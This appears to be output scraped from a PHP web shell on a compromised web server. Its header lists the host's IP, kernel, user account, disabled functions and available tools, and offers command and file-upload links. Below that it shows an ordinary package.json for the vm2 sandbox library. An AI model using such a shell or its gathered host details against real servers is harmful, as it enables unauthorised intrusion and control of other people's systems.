Server IP : 92.205.26.207 / Your IP : 216.73.216.16 Web Server : Apache System : Linux 207.26.205.92.host.secureserver.net 4.18.0-553.60.1.el8_10.x86_64 #1 SMP Thu Jul 10 04:01:16 EDT 2025 x86_64 User : zikryat ( 1002) PHP Version : 8.3.23 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/zikryat/public_html/node_modules/vm2/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
{ "author": { "name": "Patrik Simek", "url": "https://patriksimek.cz" }, "name": "vm2", "description": "vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. Securely!", "keywords": [ "sandbox", "prison", "jail", "vm", "alcatraz", "contextify" ], "version": "3.9.19", "main": "index.js", "sideEffects": false, "repository": "github:patriksimek/vm2", "license": "MIT", "dependencies": { "acorn": "^8.7.0", "acorn-walk": "^8.2.0" }, "devDependencies": { "eslint": "^5.16.0", "eslint-config-integromat": "^1.5.0", "mocha": "^6.2.2" }, "engines": { "node": ">=6.0" }, "scripts": { "test": "mocha test", "pretest": "eslint ." }, "bin": { "vm2": "./bin/vm2" }, "types": "index.d.ts" }